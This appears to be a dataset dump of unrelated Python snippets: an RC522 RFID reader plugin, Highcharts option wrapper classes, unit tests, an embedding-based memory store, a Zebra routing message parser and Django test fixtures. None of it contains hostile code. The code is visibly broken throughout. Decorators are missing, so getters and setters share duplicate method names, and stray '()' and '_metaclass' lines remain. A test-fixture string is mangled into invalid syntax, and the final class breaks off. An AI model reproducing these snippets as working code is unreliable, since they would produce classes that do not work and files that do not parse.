code stringlengths 281 23.7M |
|---|
class Plugin(plugin.PluginProto):
PLUGIN_ID = 211
PLUGIN_NAME = 'RFID - RC522'
PLUGIN_VALUENAME1 = 'Tag'
def __init__(self, taskindex):
plugin.PluginProto.__init__(self, taskindex)
self.dtype = rpieGlobals.DEVICE_TYPE_SPI
self.vtype = rpieGlobals.SENSOR_TYPE_TEXT
self.valuecount = 1
self.senddataoption = True
self.timeroption = False
self.timeroptional = False
self.formulaoption = False
self.reader = None
self.lastread = 0
self.readinprogress = 0
self.trigger = 0
def plugin_init(self, enableplugin=None):
plugin.PluginProto.plugin_init(self, enableplugin)
self.decimals[0] = (- 1)
self.initialized = False
if self.enabled:
try:
spil = self.spi
except:
spil = (- 1)
try:
rstpin = self.taskdevicepin[0]
except:
rstpin = (- 1)
spil = (- 1)
try:
ipin = self.taskdevicepin[1]
except:
ipin = (- 1)
spil = (- 1)
if (spil > (- 1)):
try:
gpios.HWPorts.remove_event_detect(int(ipin))
except:
pass
try:
self.reader = MFRC522(bus=spil, device=self.spidnum, pin_rst=rstpin)
self.initialized = True
self.timer100ms = True
self.readinprogress = 0
self.trigger = 0
self.lastread = 0
try:
if (ipin > (- 1)):
gpios.HWPorts.add_event_detect(int(ipin), gpios.FALLING, self.callback)
except:
pass
self.rc_clear_irq()
misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, 'RC522 init ok')
except Exception as e:
self.initialized = False
misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('RC522 init error:' + str(e)))
if (self.initialized == False):
self.timer100ms = False
def timer_ten_per_second(self):
if (self.timer100ms and self.initialized and (self.trigger == 0) and (self.readinprogress == 0)):
self.trigger = 1
try:
self.rc_activate_trigger()
except:
pass
self.trigger = 0
return self.timer100ms
def callback(self, channel):
if (self.readinprogress == 0):
self.readinprogress = 1
if ((time.time() - self.lastread) >= 2):
id = None
try:
c = 0
while ((not id) and (c < 3)):
id = self.rc_read_id_no_block()
c += 1
except Exception as e:
id = None
if (id is not None):
self.set_value(1, str(id), True)
self.lastread = time.time()
self._lastdataservetime = rpieTime.millis()
else:
time.sleep(0.5)
self.readinprogress = 0
self.rc_clear_irq()
if (self.trigger == 0):
self.rc_activate_trigger()
def rc_uid_to_num(self, uid):
n = 0
for i in range(0, 5):
n = ((n * 256) + uid[i])
return n
def rc_read_id_no_block(self):
(status, TagType) = self.reader.MFRC522_Request(self.reader.PICC_REQIDL)
if (status != self.reader.MI_OK):
return None
(status, uid) = self.reader.MFRC522_Anticoll()
if (status != self.reader.MI_OK):
return None
return self.rc_uid_to_num(uid)
def rc_activate_trigger(self):
self.reader.Write_MFRC522(9, 38)
self.reader.Write_MFRC522(1, 12)
self.reader.Write_MFRC522(13, 135)
def rc_clear_irq(self):
self.reader.Write_MFRC522(4, 127)
self.reader.Write_MFRC522(2, 160)
def webform_load(self):
webserver.addFormPinSelect('Reset pin (required)', 'taskdevicepin1', self.taskdevicepin[0])
webserver.addFormNote('Set to an Output pin connected to RC522 reset pin!')
webserver.addFormPinSelect('IRQ pin (required)', 'taskdevicepin2', self.taskdevicepin[1])
webserver.addFormNote('Set to an Input-Pullup pin connected to RC522 IRQ pin!')
return True
def webform_save(self, params):
changed = False
par = webserver.arg('taskdevicepin1', params)
if (par == ''):
par = 25
pval = self.taskdevicepin[0]
self.taskdevicepin[0] = int(par)
if (pval != self.taskdevicepin[0]):
changed = True
par = webserver.arg('taskdevicepin2', params)
if (par == ''):
par = 18
pval = self.taskdevicepin[1]
self.taskdevicepin[1] = int(par)
if (pval != self.taskdevicepin[1]):
changed = True
if changed:
self.plugin_init()
return True
def plugin_exit(self):
self.initialized = False
self.timer100ms = False
return True |
class OptionSeriesWaterfallSonificationContexttracksMappingNoteduration(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionSeriesColumnrangeSonificationContexttracksMappingTime(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class TestUpdateOtherFieldHook(unittest.TestCase):
def setUp(self) -> None:
self.obj_1 = DummyInstance('01', '//fbsource', 'Meta', 'PCI', None, 'Seattle', 6, 7, 8)
self.obj_2 = DummyInstance('02', '//fbsource', 'Meta', 'PCI', 'west-1', None, 6, 7, 8, 3)
def test(self) -> None:
self._init_event_hook()
self._mutability()
self._immutability()
self._update_event_hook()
self._delete_event_hook()
def _mutability(self) -> None:
mutable_data_obj_1 = (('input_path', '//fbsource', ('//fbcode', '//www')), ('region', None, ('west-1', 'west-2')), ('location', 'Seattle', ('New castle', 'Pike')), ('number', 6, (14, 18, 17)), ('counter', 7, (4, 8, 7)), ('pressure', 8, (24, 28, 27)), ('status', 'start', ('process', 'mid', 'end')))
mutable_data_obj_2 = (('region', 'west-1', (None, 'west-2')), ('location', None, ('New castle', 'Pike')))
self._test_mutable_helper(self.obj_1, mutable_data_obj_1)
self._test_mutable_helper(self.obj_2, mutable_data_obj_2)
def _test_mutable_helper(self, intance_base_obj: InstanceBase, mutable_data: Tuple) -> None:
for (test_field, original_val, change_vals) in mutable_data:
with self.subTest('Testing mutability for: ', test_field=test_field):
self.assertEqual(getattr(intance_base_obj, test_field), original_val)
for change_val in change_vals:
setattr(intance_base_obj, test_field, change_val)
self.assertEqual(getattr(intance_base_obj, test_field), change_val)
def _immutability(self) -> None:
immutable_data_obj_1 = (('instance_id', '01', '02'), ('user', 'Meta', 'AWS'), ('owner', 'PCI', 'PCS'), ('priority', 1, 3), ('name', 'Tupper01', 'Tupper03'), ('org', 'Measurement_Meta', 'signal'))
immutable_data_obj_2 = (('priority', 3, 4),)
self._test_immutable_helper(self.obj_1, immutable_data_obj_1)
self._test_immutable_helper(self.obj_2, immutable_data_obj_2)
def _test_immutable_helper(self, intance_base_obj: InstanceBase, immutable_data: Tuple) -> None:
for (test_field, original_val, change_vals) in immutable_data:
with self.subTest('Testing immutability for: ', test_field=test_field):
self.assertEqual(getattr(intance_base_obj, test_field), original_val)
with self.assertRaises(InstanceFrozenFieldError):
setattr(intance_base_obj, test_field, change_vals)
def _init_event_hook(self) -> None:
self.assertEqual(self.obj_1.name, 'Tupper01')
self.assertEqual(self.obj_1.org, 'Measurement_Meta')
self.assertEqual(self.obj_1.output_path, '//fbsource:output')
self.assertEqual(self.obj_1.storage, '//fbsource:storage')
with self.assertRaises(OutOfRangeHookError):
DummyInstance('01', '//fbsource', 'Meta', 'PCI', 'west-1', 'Seattle', (- 5), 1, 7, 1)
with self.assertRaises(OutOfRangeHookError):
DummyInstance('01', '//fbsource', 'Meta', 'PCI', 'west-1', 'Seattle', 5, 16, 57, 3)
with self.assertRaises(OutOfRangeHookError):
DummyInstance('01', '//fbsource', 'Meta', 'PCI', 'west-1', 'Seattle', 5, 6, 107, 2)
with self.assertRaises(OutOfRangeHookError):
DummyInstance('01', '//fbsource', 'Meta', 'PCI', 'west-1', 'Seattle', 5, 6, 107, 8)
def _update_event_hook(self) -> None:
self.obj_1.input_path = '//www'
self.assertEqual(self.obj_1.output_path, '//www:output')
self.assertEqual(self.obj_1.storage, '//www:storage')
self.obj_1.input_path = '//fbcode'
self.obj_1.output_path = '//fbsource:output'
self.obj_1.status = 'complete'
with self.assertRaises(InstanceFrozenFieldError):
self.obj_1.input_path = '//www'
with self.assertRaises(InstanceFrozenFieldError):
self.obj_1.output_path = '//www:output'
self.obj_1.number = 28
with self.assertRaises(OutOfRangeHookError):
self.obj_1.number = (- 18)
self.obj_1.counter = 8
with self.assertRaises(OutOfRangeHookError):
self.obj_1.counter = 18
self.obj_1.pressure = (- 98)
with self.assertRaises(OutOfRangeHookError):
self.obj_1.pressure = 218
with self.assertRaises(InstanceFrozenFieldError):
self.obj_1.priority = 2
self.assertEqual(self.obj_1.highest_pressure, 28)
self.obj_1.pressure = 70
self.assertEqual(self.obj_1.highest_pressure, 70)
self.obj_1.pressure = 5
self.assertEqual(self.obj_1.highest_pressure, 70)
def _delete_event_hook(self) -> None:
self.obj_1.location = 'Kirkland'
del self.obj_1.region
with self.assertRaises(AttributeError):
self.obj_1.region
with self.assertRaises(InstanceFrozenFieldError):
self.obj_1.location = 'Bellevue' |
class LocalMemory(BaseMemory):
def __init__(self, embedding_provider: callable):
super(BaseMemory, self).__init__()
self.docs: List[str] = []
self.embs: Optional[np.ndarray] = None
self.embedding_provider = embedding_provider
def __len__(self):
return len(self.docs)
def add(self, doc: str, key: Optional[str]=None):
if (not key):
key = doc
emb = self.embedding_provider(key)
if (self.embs is None):
self.embs = np.expand_dims(emb, 0)
else:
self.embs = np.concatenate([self.embs, [emb]], 0)
self.docs.append(doc)
def get(self, query: str, k: int):
if (self.embs is None):
return []
emb = self.embedding_provider(query)
scores = self.embs.dot(emb)
idxs = np.argsort(scores)[(- k):][::(- 1)]
return [self.docs[i] for i in idxs]
def _serialize_embs(self):
if (self.embs is None):
return None
return {'dtype': self.embs.dtype.name, 'data': self.embs.tolist(), 'shape': self.embs.shape}
def config(self):
cfg = super().config()
cfg.update({'docs': self.docs, 'embs': self._serialize_embs(), 'embedding_provider': self.embedding_provider.config()})
return cfg
def from_config(cls, config):
provider = embedding_provider_from_config(config['embedding_provider'])
obj = cls(provider)
obj.docs = config['docs']
embs = config['embs']
if (embs is not None):
obj.embs = np.array(embs['data'], dtype=embs['dtype']).reshape(embs['shape'])
return obj
def clear(self):
self.docs.clear()
self.embs = None |
def extractJstranslations1Com(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class FilterPopup(QDialog):
filterSettingsChanged = Signal(dict)
def __init__(self, parent, key_defs):
QDialog.__init__(self, parent, ((Qt.WindowStaysOnTopHint | Qt.X11BypassWindowManagerHint) | Qt.FramelessWindowHint))
self.setVisible(False)
self.filter_items = {}
layout = QVBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
frame = QFrame()
frame.setFrameStyle((QFrame.StyledPanel | QFrame.Raised))
layout.addWidget(frame)
self.__layout = QVBoxLayout()
self.__layout.setSizeConstraint(QLayout.SetFixedSize)
self.__layout.addWidget(QLabel('Filter by datatype:'))
filters = {k['metadata']['data_origin'] for k in key_defs}
for f in filters:
self.addFilterItem(f, f)
frame.setLayout(self.__layout)
self.setLayout(layout)
self.adjustSize()
def addFilterItem(self, name, _id, value=True):
self.filter_items[_id] = value
check_box = QCheckBox(name)
check_box.setChecked(value)
def toggleItem(checked):
self.filter_items[_id] = checked
self.filterSettingsChanged.emit(self.filter_items)
check_box.toggled.connect(toggleItem)
self.__layout.addWidget(check_box)
def leaveEvent(self, QEvent):
QWidget.leaveEvent(self, QEvent)
self.hide()
def show(self):
QWidget.show(self)
p = QCursor().pos()
self.move(p.x(), p.y()) |
class OptionPlotoptionsPolygonZones(Options):
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get(None)
def color(self, text: str):
self._config(text, js_type=False)
def dashStyle(self):
return self._config_get(None)
def dashStyle(self, text: str):
self._config(text, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False) |
class Readonly():
def __raw_setattr(cls, self, name, value):
object.__setattr__(self, name, value)
def __raw_delattr(cls, self, name):
object.__delattr__(self, name)
def __setattr__(self, name, value):
raise TypeError(f'{type(self).__name__} is readonly')
def __delattr__(self, name):
raise TypeError(f'{type(self).__name__} is readonly') |
def desenha_circulos_recursivos(x, y, raio):
msp.add_circle(center=(x, y), radius=raio, dxfattribs={'layer': 'SCAN'})
if (raio > 2):
desenha_circulos_recursivos((x + (raio / 2)), y, (raio / 2))
desenha_circulos_recursivos((x - (raio / 2)), y, (raio / 2))
desenha_circulos_recursivos(x, (y + (raio / 2)), (raio / 2))
desenha_circulos_recursivos(x, (y - (raio / 2)), (raio / 2)) |
class Highlight():
NAME = 'highlight'
MARGINS = 'margins'
ALIGNMENT = 'alignment'
ALIGN_CENTER = 'center'
ALIGN_HCENTER = 'hcenter'
ALIGN_VCENTER = 'vcenter'
COLOR = 'color'
BGCOLOR = 'bgcolor'
FONT = 'font'
CELLS = 'cells'
ROWS = 'rows'
COLS = 'cols'
TEXT = 'text'
def __init__(self, config):
self._config = config
self._last_visited_row = (- 1)
self._rowcells = ''
def compile(self):
for idx in self._config:
cells = self._config[idx]
for cell in cells:
for item in cell:
if ((item == Highlight.COLOR) or (item == Highlight.BGCOLOR)):
if ((cell[item] != '') and (cell[item] is not None)):
cell[item] = QColor(cell[item])
else:
cell[item] = None
if (item == Highlight.ALIGNMENT):
cell[item] = self.getAlignment(cell[item])
if (item == Highlight.FONT):
self.getFont(cell[item])
return self._config
def run(self, args):
painter = args[0]
option = args[1]
index = args[2]
style = args[3]
modelColumns = args[4]
curRow = args[5]
curColumn = args[6]
defaultPen = args[7]
defaultBrush = args[8]
cellAlignment = args[9]
cellRect = args[10]
cellValue = args[11]
modified = False
cells = self._config.get(Highlight.CELLS)
rows = self._config.get(Highlight.ROWS)
if cells:
for cell in cells:
if (curColumn not in cell[Highlight.COLS]):
continue
if (cellValue not in cell[Highlight.TEXT]):
continue
cellColor = cell.get(Highlight.COLOR)
cellBgColor = cell.get(Highlight.BGCOLOR)
if (cell.get(Highlight.ALIGNMENT) != None):
cellAlignment = cell[Highlight.ALIGNMENT]
if (cell.get(Highlight.MARGINS) != None):
cellRect.adjust(int(cell[Highlight.MARGINS][self.HMARGIN]), int(cell[Highlight.MARGINS][self.VMARGIN]), (- defaultPen.width()), (- defaultPen.width()))
modified = True
self.paintCell(style, painter, option, defaultPen, cellAlignment, cellRect, cellColor, cellBgColor, cellValue)
if (len(rows) == 0):
return (modified,)
if (curRow != self._last_visited_row):
self._rowcells = ' '.join([index.sibling(curRow, col).data() for col in range(0, modelColumns)])
self._last_visited_row = curRow
for row in rows:
skip = True
for text in row[Highlight.TEXT]:
if (text in self._rowcells):
skip = False
if skip:
continue
cellColor = row.get(Highlight.COLOR)
cellBgColor = row.get(Highlight.BGCOLOR)
if (row.get(Highlight.ALIGNMENT) != None):
cellAlignment = row[Highlight.ALIGNMENT]
if (row.get(Highlight.MARGINS) != None):
cellRect.adjust(int(row[Highlight.MARGINS][self.HMARGIN]), int(row[Highlight.MARGINS][self.VMARGIN]), (- defaultPen.width()), (- defaultPen.width()))
modified = True
self.paintCell(style, painter, option, defaultPen, cellAlignment, cellRect, cellColor, cellBgColor, cellValue)
return (modified,)
def paintCell(self, style, painter, option, defaultPen, cellAlignment, cellRect, cellColor, cellBgColor, cellValue):
cellSelected = (option.state & QStyle.State_Selected)
painter.save()
if (not cellSelected):
if (cellBgColor != None):
painter.fillRect(option.rect, cellBgColor)
if (cellColor is not None):
defaultPen.setColor(cellColor)
painter.setPen(defaultPen)
style.drawItemText(painter, cellRect, cellAlignment, option.palette, True, cellValue)
painter.restore()
def getAlignment(self, alignments):
alignFlags = 0
for align in alignments:
if (align == Highlight.ALIGN_CENTER):
alignFlags |= QtCore.Qt.AlignCenter
elif (align == Highlight.ALIGN_HCENTER):
alignFlags |= QtCore.Qt.AlignHCenter
elif (align == Highlight.ALIGN_VCENTER):
alignFlags |= QtCore.Qt.AlignVCenter
if (alignFlags == 0):
return None
return alignFlags
def getFont(self, font):
pass |
class Circle(Ellipse):
def __init__(self, radius, colour=None, line_width=None, position=None, anti_aliasing=None):
self._radius = radius
if (position is None):
position = defaults.circle_position
if (colour is None):
colour = defaults.circle_colour
if (line_width is None):
line_width = defaults.circle_line_width
elif ((line_width < 0) or (line_width >= self._radius)):
raise AttributeError('line_width must be >= 0 and < radius!')
if (anti_aliasing is not None):
self._anti_aliasing = anti_aliasing
else:
self._anti_aliasing = defaults.circle_anti_aliasing
Ellipse.__init__(self, [radius, radius], colour, line_width, position, anti_aliasing)
_getter_exception_message = 'Cannot set {0} if surface exists!'
def radius(self):
return self._radius
def radius(self, value):
if self.has_surface:
raise AttributeError(Circle._getter_exception_message.format('radius'))
else:
self._radius = value
def get_polar_coordiantes(self):
raise DeprecationWarning(('get_polar_coordiantes is obsolete. ' + 'Please use the property polar_position'))
def set_polar_coordinates(self, radial, angle_in_degrees):
raise DeprecationWarning(('set_polar_coordinates is obsolete. ' + 'Please use the property polar_position'))
def overlapping_with_circle(self, other, minimal_gap=0):
d = self.distance(other)
return ((d - minimal_gap) <= (other._radius + self._radius))
def center_inside_circle(self, other):
d = self.distance(other)
return (d <= other._radius)
def inside_circle(self, other):
d = self.distance(other)
return (d <= (other._radius - self._radius))
def _demo(exp=None):
if (exp is None):
from .. import control
control.set_develop_mode(True)
control.defaults.event_logging = 0
exp_ = control.initialize()
dot = Circle(radius=100, anti_aliasing=10)
dot.present()
if (exp is None):
exp_.clock.wait(1000) |
def drives_for_iostandard(iostandard):
if (iostandard in ['LVCMOS18', 'LVCMOS15']):
drives = [2, 4, 6, 8, 12, 16]
elif (iostandard == 'LVCMOS12'):
drives = [2, 4, 6, 8]
elif (iostandard in (SSTL + DIFF_SSTL)):
return ['_FIXED']
else:
assert False, 'this line should be unreachable'
return drives |
def generate_mod():
if (not output_folder):
status_label.config(text='Error: Please select the output folder.')
return
if blarc_file_path:
script_dir = os.path.dirname(os.path.abspath(__file__))
extract_script_path = os.path.join(script_dir, 'extract.py')
try:
subprocess.run(['python', extract_script_path, blarc_file_path, output_folder], check=True)
print('Extraction completed successfully.')
except subprocess.CalledProcessError as e:
print('Extraction failed:', e)
else:
print('No BLARC file selected.')
scaling_factor = calculate_ratio()
if (not blyt_folder):
status_label.config(text='Error: Please select the BLYT folder.')
return
ratio = calculate_ratio()
if (not os.path.isdir(blyt_folder)):
status_label.config(text='Error: Invalid BLYT folder.')
return
destination_blyt_folder = os.path.join(output_folder, 'blyt')
os.makedirs(destination_blyt_folder, exist_ok=True)
for (root, _, files) in os.walk(blyt_folder):
for file in files:
source_path = os.path.join(root, file)
destination_path = os.path.join(destination_blyt_folder, file)
copy2(source_path, destination_path)
status_label.config(text='Output created successfully.') |
class OptionPlotoptionsColumnDragdropDraghandle(Options):
def className(self):
return self._config_get('highcharts-drag-handle')
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get('#fff')
def color(self, text: str):
self._config(text, js_type=False)
def cursor(self):
return self._config_get(None)
def cursor(self, text: str):
self._config(text, js_type=False)
def lineColor(self):
return self._config_get('rgba(0, 0, 0, 0.6)')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(1)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def pathFormatter(self):
return self._config_get(None)
def pathFormatter(self, value: Any):
self._config(value, js_type=False)
def zIndex(self):
return self._config_get(901)
def zIndex(self, num: float):
self._config(num, js_type=False) |
class OFVersions():
VERSION_1_0 = OFVersion('1.0', 1)
VERSION_1_1 = OFVersion('1.1', 2)
VERSION_1_2 = OFVersion('1.2', 3)
VERSION_1_3 = OFVersion('1.3', 4)
VERSION_1_4 = OFVersion('1.4', 5)
VERSION_1_5 = OFVersion('1.5', 6)
all_supported = (VERSION_1_0, VERSION_1_1, VERSION_1_2, VERSION_1_3, VERSION_1_4, VERSION_1_5)
wire_version_map = {v.wire_version: v for v in all_supported}
version_string_map = {v.version: v for v in all_supported}
target_versions = []
def from_wire(w):
return OFVersions.wire_version_map[w]
def from_string(s):
return OFVersions.version_string_map[s]
def from_strings(*strings):
return tuple((OFVersions.version_string_map[s] for s in strings)) |
def get_ddr_phy_init_sequence(phy_settings, timing_settings):
cl = phy_settings.cl
bl = 4
mr = (log2_int(bl) + (cl << 4))
emr = 0
reset_dll = (1 << 8)
init_sequence = [('Bring CKE high', 0, 0, cmds['CKE'], 20000), ('Precharge All', 1024, 0, cmds['PRECHARGE_ALL'], 0), ('Load Extended Mode Register', emr, 1, cmds['MODE_REGISTER'], 0), ('Load Mode Register / Reset DLL, CL={0:d}, BL={1:d}'.format(cl, bl), (mr + reset_dll), 0, cmds['MODE_REGISTER'], 200), ('Precharge All', 1024, 0, cmds['PRECHARGE_ALL'], 0), ('Auto Refresh', 0, 0, cmds['AUTO_REFRESH'], 4), ('Auto Refresh', 0, 0, cmds['AUTO_REFRESH'], 4), ('Load Mode Register / CL={0:d}, BL={1:d}'.format(cl, bl), mr, 0, cmds['MODE_REGISTER'], 200)]
return (init_sequence, None) |
def get_observation_template_details(observation_template):
obs_comp = frappe.qb.DocType('Observation Component')
obs_temp = frappe.qb.DocType('Observation Template')
from pypika import Case
data = frappe.qb.from_(obs_comp).left_join(obs_temp).on((obs_comp.observation_template == obs_temp.name)).select(Case().when((obs_temp.sample_collection_required == 0), obs_temp.name).else_(None).as_('no_sample_reqd'), Case().when((obs_temp.sample_collection_required == 1), obs_temp.name).else_(None).as_('sample_reqd')).where((obs_comp.parent == observation_template)).run(as_dict=True)
sample_reqd_component_obs = []
non_sample_reqd_component_obs = []
for d in data:
if d.get('no_sample_reqd'):
non_sample_reqd_component_obs.append(d.get('no_sample_reqd'))
elif d.get('sample_reqd'):
sample_reqd_component_obs.append(d.get('sample_reqd'))
return (sample_reqd_component_obs, non_sample_reqd_component_obs) |
_metaclass(abc.ABCMeta)
class _ZebraRedistribute(_ZebraMessageBody):
_HEADER_FMT = '!B'
HEADER_SIZE = struct.calcsize(_HEADER_FMT)
_V4_HEADER_FMT = '!BBH'
V4_HEADER_SIZE = struct.calcsize(_V4_HEADER_FMT)
def __init__(self, route_type, afi=None, instance=None):
super(_ZebraRedistribute, self).__init__()
self.afi = afi
self.route_type = route_type
self.instance = instance
def parse(cls, buf, version=_DEFAULT_VERSION):
afi = None
instance = None
if (version <= 3):
(route_type,) = struct.unpack_from(cls._HEADER_FMT, buf)
elif (version == 4):
(afi, route_type, instance) = struct.unpack_from(cls._V4_HEADER_FMT, buf)
else:
raise struct.error(('Unsupported Zebra protocol version: %d' % version))
return cls(route_type, afi, instance)
def serialize(self, version=_DEFAULT_VERSION):
if (version <= 3):
return struct.pack(self._HEADER_FMT, self.route_type)
elif (version == 4):
return struct.pack(self._V4_HEADER_FMT, self.afi, self.route_type, self.instance)
else:
raise ValueError(('Unsupported Zebra protocol version: %d' % version)) |
()
('--chroot', '-r', 'chroot_names', help='Chroot name, e.g. fedora-18-x86_64.', multiple=True)
def drop_chroot(chroot_names):
for chroot_name in chroot_names:
try:
coprs_logic.MockChrootsLogic.delete_by_name(chroot_name)
db.session.commit()
except exceptions.MalformedArgumentException:
print_invalid_format(chroot_name)
except exceptions.NotFoundException:
print_doesnt_exist(chroot_name) |
def log_fortianalyzer_override_filter(data, fos):
vdom = data['vdom']
log_fortianalyzer_override_filter_data = data['log_fortianalyzer_override_filter']
filtered_data = underscore_to_hyphen(filter_log_fortianalyzer_override_filter_data(log_fortianalyzer_override_filter_data))
return fos.set('log.fortianalyzer', 'override-filter', data=filtered_data, vdom=vdom) |
class TestLegalSearch(unittest.TestCase):
def setUp(self):
self.app = rest.app.test_client()
('webservices.rest.legal.es_client.search', legal_search_data)
def test_default_search(self):
response = self.app.get('/v1/legal/search/?&api_key=1234')
assert (response.status_code == 200)
result = json.loads(codecs.decode(response.data))
result_data = {}
for one_doc_type in ALL_DOCUMENT_TYPES:
type_ = result[one_doc_type][0]['type']
if (type_ == one_doc_type):
one_type_data = {one_doc_type: [{'type': one_doc_type, 'no': '1111', 'highlights': [], 'document_highlights': {}, 'documents': [{'document_id': 100, 'text': 'aaa bbb'}]}, {'type': one_doc_type, 'no': '2222', 'highlights': [], 'document_highlights': {}, 'documents': [{'document_id': 200, 'text': 'ccc ddd'}]}], ('total_' + one_doc_type): 2}
result_data.update(one_type_data)
result_data.update({'total_all': 12})
assert (result == result_data)
('webservices.rest.legal.es_client.search', legal_search_data)
def test_search_by_type(self):
for one_doc_type in ALL_DOCUMENT_TYPES:
response = self.app.get((('/v1/legal/search/?type=' + one_doc_type) + '&api_key=1234'))
assert (response.status_code == 200)
result = json.loads(codecs.decode(response.data))
type_ = result[one_doc_type][0]['type']
if (type_ == one_doc_type):
assert (result == {one_doc_type: [{'type': one_doc_type, 'no': '1111', 'highlights': [], 'document_highlights': {}, 'documents': [{'document_id': 100, 'text': 'aaa bbb'}]}, {'type': one_doc_type, 'no': '2222', 'highlights': [], 'document_highlights': {}, 'documents': [{'document_id': 200, 'text': 'ccc ddd'}]}], ('total_' + one_doc_type): 2, 'total_all': 2})
('webservices.rest.legal.es_client.search', legal_invalid_search)
def test_invalid_search(self):
response = self.app.get('/v1/legal/search/?%20AND%20OR&type=advisory_opinions')
assert (response.status_code == 400) |
def download_test_data():
for js in JOB_STATUS:
baker.make('download.JobStatus', job_status_id=js.id, name=js.name, description=js.desc)
ata1 = baker.make('references.ToptierAgency', name='Bureau of Things', toptier_code='100', website=' mission='test', icon_filename='test')
ata2 = baker.make('references.ToptierAgency', name='Bureau of Stuff', toptier_code='101', website=' mission='test', icon_filename='test')
baker.make('references.SubtierAgency', name='Bureau of Things', _fill_optional=True)
aa1 = baker.make('references.Agency', id=1, toptier_agency=ata1, toptier_flag=False, _fill_optional=True)
aa2 = baker.make('references.Agency', id=2, toptier_agency=ata2, toptier_flag=False, _fill_optional=True)
ata3 = baker.make('references.ToptierAgency', name='Bureau of Money', toptier_code='102', website=' mission='test', icon_filename='test')
baker.make('references.SubtierAgency', name='Bureau of Things', _fill_optional=True)
baker.make('references.Agency', id=3, toptier_agency=ata3, toptier_flag=False, _fill_optional=True)
award1 = baker.make('search.AwardSearch', award_id=123, category='idv')
award2 = baker.make('search.AwardSearch', award_id=456, category='contracts')
award3 = baker.make('search.AwardSearch', award_id=789, category='assistance')
baker.make(TransactionSearch, transaction_id=1, award=award1, action_date='2018-01-02', type=random.choice(list(award_type_mapping)), modification_number=1, awarding_agency_id=aa1.id, is_fpds=True, piid='tc1piid', awarding_toptier_agency_name='Bureau of Things', awarding_subtier_agency_name='Bureau of Things')
baker.make(TransactionSearch, transaction_id=2, award=award2, action_date='2018-01-02', type=random.choice(list(award_type_mapping)), modification_number=1, awarding_agency_id=aa2.id, is_fpds=True, piid='tc2piid', awarding_toptier_agency_name='Bureau of Stuff', awarding_subtier_agency_name='Bureau of Things')
baker.make(TransactionSearch, transaction_id=3, award=award3, action_date='2018-01-02', award_date_signed='2020-01-02', type=random.choice(list(award_type_mapping)), modification_number=1, awarding_agency_id=aa2.id, is_fpds=False, fain='ta1fain', awarding_toptier_agency_name='Bureau of Stuff', awarding_subtier_agency_name='Bureau of Things')
update_awards() |
class CSVSourceFactory(HasTraits):
def csv_loaded_callback(self, object):
self.data_source_wizard = DataSourceWizardView(data_sources=self.csv_loader.data_dict)
self.data_source_wizard.edit_traits()
def __call__(self, fname):
self.csv_loader = CSVLoader(filename=fname)
self.csv_loader.guess_defaults()
controller = CallbackCSVLoader(model=self.csv_loader, callback=self.csv_loaded_callback)
controller.edit_traits() |
def ExtractValue(message):
if message.HasField('string_value'):
return message.string_value
elif message.HasField('long_value'):
return message.long_value
elif message.HasField('bool_value'):
return message.bool_value
elif message.HasField('double_value'):
return message.double_value
elif message.HasField('list_value'):
return list((ExtractValue(value) for value in message.list_value.values))
elif message.HasField('tuple_value'):
return tuple((ExtractValue(value) for value in message.tuple_value.values)) |
def test_snapshot_merge(snapshot: Snapshot):
update_event = PartialSnapshot(snapshot)
update_event.update_forward_model(real_id='1', forward_model_id='0', forward_model=ForwardModel(status='Finished', index='0', start_time=datetime(year=2020, month=10, day=27), end_time=datetime(year=2020, month=10, day=28)))
update_event.update_forward_model(real_id='1', forward_model_id='1', forward_model=ForwardModel(status='Running', index='1', start_time=datetime(year=2020, month=10, day=27)))
update_event.update_forward_model(real_id='9', forward_model_id='0', forward_model=ForwardModel(status='Running', index='0', start_time=datetime(year=2020, month=10, day=27)))
snapshot.merge_event(update_event)
assert (snapshot.status == state.ENSEMBLE_STATE_UNKNOWN)
assert (snapshot.get_job(real_id='1', forward_model_id='0') == ForwardModel(status='Finished', index='0', start_time=datetime(year=2020, month=10, day=27), end_time=datetime(year=2020, month=10, day=28), name='forward_model0'))
assert (snapshot.get_job(real_id='1', forward_model_id='1') == ForwardModel(status='Running', index='1', start_time=datetime(year=2020, month=10, day=27), name='forward_model1'))
assert (snapshot.get_job(real_id='9', forward_model_id='0').status == 'Running')
assert (snapshot.get_job(real_id='9', forward_model_id='0') == ForwardModel(status='Running', index='0', start_time=datetime(year=2020, month=10, day=27), name='forward_model0')) |
class ScheduleBFactory(BaseFactory):
class Meta():
model = models.ScheduleB
sub_id = factory.Sequence((lambda n: n))
report_year = 2016
two_year_transaction_period = 2016
_generation
def update_fulltext(obj, create, extracted, **kwargs):
obj.disbursement_description_text = sa.func.to_tsvector(obj.disbursement_description) |
class InstantiateGvarTest(object):
.parametrize('glyph_name', ['hyphen'])
